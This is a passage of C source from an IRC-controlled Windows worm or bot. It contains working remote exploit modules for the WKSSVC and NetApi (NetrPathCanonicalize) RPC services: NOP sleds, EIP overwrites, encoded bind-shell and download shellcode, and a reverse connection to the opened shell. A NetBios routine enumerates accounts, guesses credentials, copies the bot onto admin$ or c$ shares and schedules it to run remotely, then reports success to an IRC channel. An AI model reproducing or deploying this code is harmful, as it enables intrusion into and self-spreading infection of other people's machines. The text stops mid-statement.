char* GetRemoteComputerName(char* ip) { static char compname[100] = ""; DWORD dwLevel = 102; LPWKSTA_INFO_102 pBuf = NULL; NET_API_STATUS nStatus; LPTSTR pszServerName = NULL; NETRESOURCE nr; memset(&nr,0,sizeof(NETRESOURCE)); strcpy(remote_addr,"\\\\"); strcat(remote_addr,ip); strcat(remote_addr,"\\"); strcat(remote_addr,"admin$"); nr.lpRemoteName= (LPTSTR)remote_addr; nr.dwType=RESOURCETYPE_DISK; nr.lpLocalName=NULL; nr.lpProvider=NULL; nStatus = fWNetAddConnection2(&nr, NULL,NULL, 0); mbstowcs(remote_addr2, ip, MB_CUR_MAX ); nStatus = fNetWkstaGetInfo((unsigned short*)remote_addr2, dwLevel, (LPBYTE *)&pBuf); if (nStatus == NERR_Success) WideCharToMultiByte(CP_ACP, 0, pBuf->wki102_computername, -1, compname, sizeof(compname), NULL, NULL); if (pBuf != NULL) fNetApiBufferFree(pBuf); return compname; }
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn) BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn) { IRC* irc=(IRC*)conn; //irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); BOOL success=FALSE; int TargetOS; // char szShellBuf[ 512 ]; int iShellSize; // ============================= char* pszTarget; // --- char szNetbiosTarget[ 8192 ]; wchar_t wszNetbiosTarget[ 8192 ]; unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ]; unsigned char szExploitsData[ 3500 ]; unsigned long nExploitsDataPos; wchar_t wszExploitsData[ sizeof( szExploitsData ) ]; // --- char szIPC[ 8192 ]; NETRESOURCE NetSource; // --- char szPipe[ 8192 ]; HANDLE hPipe; // --- RPC_ReqBind BindPacket; unsigned long nBytesWritten; RPC_ReqNorm ReqNormalHeader; unsigned long nPacketSize; unsigned char* pPacket; unsigned long nPacketPos; // ============================ TargetOS = FpHost(exinfo.ip, FP_PORT5K); if(TargetOS != OS_WINXP) TargetOS = FpHost(exinfo.ip, FP_RPC); if(TargetOS != OS_WINXP) return FALSE; else success=TRUE; // irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // parameters pszTarget=exinfo.ip; // char URL[MAX_HOSTNAME]; // char fname[_MAX_FNAME]; // sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9); // _snprintf(URL,sizeof(URL), // "ftp://*****:*****@%s:%d/%s", // (PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname); unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL); if (!iShellSize) return FALSE; // get shellcode //iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); //if( !iShellSize ) // return FALSE; // generate exploits buffer // ======================== ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded)); ZeroMemory(szExploitsData, sizeof(szExploitsData)); ZeroMemory(wszExploitsData, sizeof(wszExploitsData)); // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string) memset(szExploitsData,'A',sizeof(szExploitsData)-1); // new EIP *(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP; // some NOPs nExploitsDataPos = 2300; // add stack memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 ); nExploitsDataPos += sizeof( szStack ) - 1; // add decoder memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 ); nExploitsDataPos += sizeof( szDecoder ) - 1; // add shellcode // - bind port // - encode Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded ); // - add memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) ); nExploitsDataPos += strlen( (char*)szShellcodeEncoded ); // - 0 terminaten for decoder szExploitsData[ nExploitsDataPos ] = 0; nExploitsDataPos += 1; // convert to UNICODE // ================== for( int n = 0; n < sizeof( szExploitsData ); n++ ) wszExploitsData[ n ] = szExploitsData[ n ]; //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) ); _snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget); mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t)); // create NULL session // =================== if( strcmpi( pszTarget, "." ) ) { //_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget); _snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget); strncat(szIPC,"ipc$",sizeof(szIPC)); ZeroMemory(&NetSource,sizeof(NetSource)); NetSource.lpRemoteName = szIPC; fWNetAddConnection2(&NetSource,"","",0); } // =================== // connect to pipe // =============== //_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget); _snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget); strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe)); hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(hPipe == INVALID_HANDLE_VALUE) { fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE); return FALSE; } // =============== // bind packet // =========== ZeroMemory(&BindPacket,sizeof(BindPacket)); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; // bind BindPacket.NormalHeader.flags = 3; // first + last fragment BindPacket.NormalHeader.representation = 0x00000010; // little endian BindPacket.NormalHeader.fraglength = sizeof(BindPacket); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 1; BindPacket.maxtsize = 4280; BindPacket.maxrsize = 4280; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; BindPacket.Interface1.version = 1; memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16); BindPacket.Interface2.version = 2; memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16); // send if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL)) { //irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); CloseHandle(hPipe); fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE); return FALSE; } // =========== // request // ======= // generate packet // --------------- // calc packet size nPacketSize = 0; nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); while(nPacketSize % 4) nPacketSize++; if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName) nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; nPacketSize += 8; // szWSSKVCUnknown3 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += 4; // NetAddAlternateComputerName = reserved else nPacketSize += 2; // NetValidateName = NameType // alloc packet pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { //irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } ZeroMemory(pPacket,nPacketSize); // build packet nPacketPos = 0; // - szWKSSVCUnknown1 memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1; // - wszNetbiosTarget ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget ); nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWKSSVCUnknown2 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1; } // - wszExploitsData ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData ); nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWSSKVCUnknown3 (only eigth 0x00s) ZeroMemory(&pPacket[nPacketPos],8); nPacketPos += 8; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { // NetAddAlternateComputerName = 0 *(DWORD*)&pPacket[ nPacketPos ] = 0; nPacketPos += sizeof( DWORD ); } else { // NetValidateName = NetSetupMachine *(unsigned short*)&pPacket[ nPacketPos ] = 1; nPacketPos += 2; } // header ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader)); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; // request ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 1; ReqNormalHeader.prescontext = 0; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName else ReqNormalHeader.opnum = 25; // NetrValidateName2 // send if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) { //irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // ======= // clean up // =================; CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); if (success) { Sleep(5000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } return TRUE; }
BOOL NetBios(EXINFO exinfo) { char szUsername[300], RemoteName[200], szServer[18]; WCHAR *pszServerName = NULL,sName[500]; LPUSER_INFO_0 pBuf=NULL, pTmpBuf; DWORD dwLevel=0, dwPrefMaxLen=MAX_PREFERRED_LENGTH, dwEntriesRead=0, dwTotalEntries=0, dwResumeHandle=0, dwTotalCount=0; NET_API_STATUS nStatus; sprintf(szServer,"\\\\%s",exinfo.ip); MultiByteToWideChar(CP_ACP,0,szServer,-1,sName,sizeof(sName)); pszServerName=sName; NETRESOURCE nr; nr.lpLocalName=NULL; nr.lpProvider=NULL; nr.dwType=RESOURCETYPE_ANY; sprintf(RemoteName,"%s\\ipc$",szServer); nr.lpRemoteName=RemoteName; if (fWNetAddConnection2(&nr,"","",0) != NO_ERROR) { fWNetCancelConnection2(RemoteName,0,TRUE); return FALSE; } do { nStatus = fNetUserEnum(pszServerName, dwLevel, FILTER_NORMAL_ACCOUNT, (LPBYTE*)&pBuf, dwPrefMaxLen, &dwEntriesRead, &dwTotalEntries, &dwResumeHandle); fWNetCancelConnection2(RemoteName,0,TRUE); // If the call succeeds, if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA)) { if ((pTmpBuf = pBuf) != NULL) { for (DWORD i = 0; (i < dwEntriesRead); i++) { if (pTmpBuf == NULL) break; WideCharToMultiByte(CP_ACP,0,pTmpBuf->usri0_name,-1,szUsername,sizeof(szUsername),NULL,NULL); if ((RootBox(szUsername,szServer,exinfo))==TRUE) break; pTmpBuf++; dwTotalCount++; } } } if (pBuf != NULL) { fNetApiBufferFree(pBuf); pBuf = NULL; } } while (nStatus == ERROR_MORE_DATA); if (pBuf != NULL) fNetApiBufferFree(pBuf); if (nStatus == ERROR_ACCESS_DENIED) { for (int i=0; usernames[i]; i++) { if ((RootBox(usernames[i],szServer,exinfo))==TRUE) break; } } return TRUE; }
BOOL NetConnect(char *szUsername, char *szPassword, char *szServer, EXINFO exinfo) { NETRESOURCE nr; memset(&nr,0,sizeof(NETRESOURCE)); nr.lpRemoteName=szServer; nr.dwType=RESOURCETYPE_DISK; nr.lpLocalName=NULL; nr.lpProvider=NULL; // Call the WNetAddConnection2 function to make the connection, // specifying a persistent connection. DWORD dwResult = fWNetAddConnection2(&nr, (LPSTR)szPassword, (LPSTR)szUsername, 0); if(dwResult != NO_ERROR) { Sleep (10); fWNetCancelConnection2(szServer,CONNECT_UPDATE_PROFILE,TRUE); return FALSE; } WCHAR wszNetbios[200], wszFilename[MAX_PATH]; char szRemoteFile[MAX_PATH], buffer[IRCLINE]; char *sharepath[]={"Admin$\\system32","c$\\winnt\\system32","c$\\windows\\system32","c","d"}; TIME_OF_DAY_INFO *tinfo=NULL; DWORD JobID; AT_INFO at_time; MultiByteToWideChar(CP_ACP,0,szServer,-1,wszNetbios,sizeof(wszNetbios)); NET_API_STATUS nStatus=fNetRemoteTOD(wszNetbios,(LPBYTE *)&tinfo); if (nStatus == NERR_Success) { if (tinfo) { //_snprintf(buffer,sizeof(buffer),"[%s]: Connected to IP: %s (%s/%s).", exploit[exinfo.exploit].name,szServer, szUsername, szPassword); //addlog(buffer); int j = 0;; for (int i=0;i<(sizeof(sharepath) / sizeof(LPTSTR));i++) { sprintf(szRemoteFile,"%s\\%s\\%s",szServer,sharepath[i],filename); if ((j=CopyFile(filename,szRemoteFile,FALSE)) != 0) break; else if (GetLastError() == ERROR_ACCESS_DENIED) { if (_access(szRemoteFile,00) == 0) { szRemoteFile[strlen(szRemoteFile)-5] = (char)((rand()%10)+48); if ((j=CopyFile(filename,szRemoteFile,FALSE)) != 0) break; } } } if (!j) { fNetApiBufferFree(tinfo); fWNetCancelConnection2(szServer,CONNECT_UPDATE_PROFILE,TRUE); return FALSE; } DWORD jobtime=tinfo->tod_elapsedt / 60; jobtime-=tinfo->tod_timezone; jobtime+=2; jobtime%=(24*60); memset(&at_time,0,sizeof(AT_INFO)); at_time.JobTime=jobtime*60000; MultiByteToWideChar(CP_ACP,0,filename,-1,wszFilename,sizeof(wszFilename)); at_time.Command=wszFilename; if ((nStatus=fNetScheduleJobAdd(wszNetbios,(BYTE *)&at_time,&JobID)) == NERR_Success) { _snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Share: \\%s, User: (%s/%s)",exploit[exinfo.exploit].name,szServer,sharepath[i],szUsername,((strcmp(szPassword,"")==0)?("(no password)"):(szPassword))); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; } } } fWNetCancelConnection2(szServer,CONNECT_UPDATE_PROFILE,TRUE); return TRUE; }
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo ) { int TargetOS; char szShellBuf[ 512 ]; int iShellSize; // ============================= char* pszTarget; // --- char szNetbiosTarget[ 8192 ]; wchar_t wszNetbiosTarget[ 8192 ]; unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ]; unsigned char szExploitsData[ 3500 ]; unsigned long nExploitsDataPos; wchar_t wszExploitsData[ sizeof( szExploitsData ) ]; // --- char szIPC[ 8192 ]; NETRESOURCE NetSource; // --- char szPipe[ 8192 ]; HANDLE hPipe; // --- RPC_ReqBind BindPacket; unsigned long nBytesWritten; RPC_ReqNorm ReqNormalHeader; unsigned long nPacketSize; unsigned char* pPacket; unsigned long nPacketPos; // ============================ // check if xp TargetOS = FpHost( exinfo.ip, FP_RPC ); if( TargetOS != OS_WINXP ) return FALSE; // parameters pszTarget = exinfo.ip; // get shellcode iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); if( !iShellSize ) return FALSE; // generate exploits buffer // ======================== memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) ); memset( szExploitsData, 0, sizeof( szExploitsData ) ); memset( wszExploitsData, 0, sizeof( wszExploitsData ) ); // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string) memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 ); // new EIP *(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP; // some NOPs nExploitsDataPos = 2300; // add stack memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 ); nExploitsDataPos += sizeof( szStack ) - 1; // add decoder memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 ); nExploitsDataPos += sizeof( szDecoder ) - 1; // add shellcode // - bind port // - encode Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded ); // - add memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) ); nExploitsDataPos += strlen( (char*)szShellcodeEncoded ); // - 0 terminaten for decoder szExploitsData[ nExploitsDataPos ] = 0; nExploitsDataPos += 1; // convert to UNICODE // ================== for( int n = 0; n < sizeof( szExploitsData ); n++ ) wszExploitsData[ n ] = szExploitsData[ n ]; //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) ); snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget ); mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) ); // create NULL session // =================== if( strcmpi( pszTarget, "." ) ) { snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget ); memset( &NetSource, 0 ,sizeof( NetSource ) ); NetSource.lpRemoteName = szIPC; fWNetAddConnection2( &NetSource, "", "", 0 ); } // =================== // connect to pipe // =============== snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget ); hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if( hPipe == INVALID_HANDLE_VALUE ) { fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // =============== // bind packet // =========== memset( &BindPacket, 0, sizeof( BindPacket ) ); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; // bind BindPacket.NormalHeader.flags = 3; // first + last fragment BindPacket.NormalHeader.representation = 0x00000010; // little endian BindPacket.NormalHeader.fraglength = sizeof( BindPacket ); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 1; BindPacket.maxtsize = 4280; BindPacket.maxrsize = 4280; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; BindPacket.Interface1.version = 1; memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 ); BindPacket.Interface2.version = 2; memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 ); // send if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // =========== // request // ======= // generate packet // --------------- // calc packet size nPacketSize = 0; nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; nPacketSize += 8; // szWSSKVCUnknown3 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += 4; // NetAddAlternateComputerName = reserved else nPacketSize += 2; // NetValidateName = NameType // alloc packet pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } memset( pPacket, 0, nPacketSize ); // build packet nPacketPos = 0; // - szWKSSVCUnknown1 memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1; // - wszNetbiosTarget ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget ); nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWKSSVCUnknown2 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1; } // - wszExploitsData ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData ); nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWSSKVCUnknown3 (only eigth 0x00s) memset( &pPacket[ nPacketPos ], 0, 8 ); nPacketPos += 8; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { // NetAddAlternateComputerName = 0 *(DWORD*)&pPacket[ nPacketPos ] = 0; nPacketPos += sizeof( DWORD ); } else { // NetValidateName = NetSetupMachine *(unsigned short*)&pPacket[ nPacketPos ] = 1; nPacketPos += 2; } // header memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) ); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; // request ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 1; ReqNormalHeader.prescontext = 0; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName else ReqNormalHeader.opnum = 25; // NetrValidateName2 // send if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) { CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // ======= // clean up // =================; CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); char buffer[ IRCLINE ]; //_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; }
BOOL exnetapi (EXINFO exinfo, int nTarget) { char szIPC[ 8192 ]; NETRESOURCE NetSource; DWORD nNullSessionError; char szPipe[ 8192 ]; HANDLE hPipe; RPC_ReqBind BindPacket; DWORD nBytesWritten; DWORD nBytesRead; unsigned char RecvBuff[ 8192 ]; NetrPathCanonicalize_Start PStart; NetrPathCanonicalize_End PEnd; size_t nPathLen; size_t nBufferPos; unsigned char *pPath; size_t nPacketSize; unsigned char *pPacket; RPC_ReqNorm ReqNormalHeader; bool bExit; int nCount; OVERLAPPED ov; if( _stricmp( exinfo.ip, "." ) ) { _snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", exinfo.ip ); memset( &NetSource, 0 ,sizeof( NetSource ) ); NetSource.lpRemoteName = szIPC; nNullSessionError = fWNetAddConnection2( &NetSource, "", "", 0 ); } _snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", exinfo.ip ); hPipe = CreateFile( szPipe, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL ); if( hPipe == INVALID_HANDLE_VALUE ) return false; memset( &BindPacket, 0, sizeof( BindPacket ) ); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; BindPacket.NormalHeader.flags = 3; BindPacket.NormalHeader.representation = 0x00000010; BindPacket.NormalHeader.fraglength = sizeof( BindPacket ); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 0; BindPacket.maxtsize = MAX_FRAG_SIZE; BindPacket.maxrsize = MAX_FRAG_SIZE; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 ); BindPacket.Interface1.version = 3; memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 ); BindPacket.Interface2.version = 2; if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) { CloseHandle( hPipe ); return false; } ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL ); srand( (int)time( NULL ) ); memset( &PStart, 0x41, sizeof( PStart ) ); memset( &PEnd, 0x41, sizeof( PEnd ) ); PStart.ReferendID = rand(); PStart.Server.length = 1; PStart.Server.offset = 0; PStart.Server.maxlength = 1; PStart.Server_Data = L''; if( Targets[ nTarget ].bIsWinXP ) { PEnd.Prefix.length = 1; PEnd.Prefix.offset = 0; PEnd.Prefix.maxlength = 1; memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 ); } else { PEnd.Prefix.length = 2; PEnd.Prefix.offset = 0; PEnd.Prefix.maxlength = 2; memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 ); } PEnd.OutBufLen = rand() % 250 + 1; PEnd.Type = rand() % 250 + 1;; PEnd.Flags = 0; nPathLen = Targets[ nTarget ].nPathLen; pPath = (unsigned char*)malloc( nPathLen ); if( !pPath ) { CloseHandle( hPipe ); return false; } memset( pPath, 0x90, nPathLen - 2 ); memset( pPath + nPathLen - 2, 0, 2 ); nBufferPos = Targets[ nTarget ].nShellCodeAddr; memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 ); nBufferPos += sizeof( stack ) - 1; memcpy( pPath + nBufferPos, scode, sizeof( scode ) - 1 ); nBufferPos += sizeof( scode ) - 1; nBufferPos = Targets[ nTarget ].nOffsetStartAddr; if( Targets[ nTarget ].bIsWinXP ) { memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 8; memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 32; memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 8; memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos 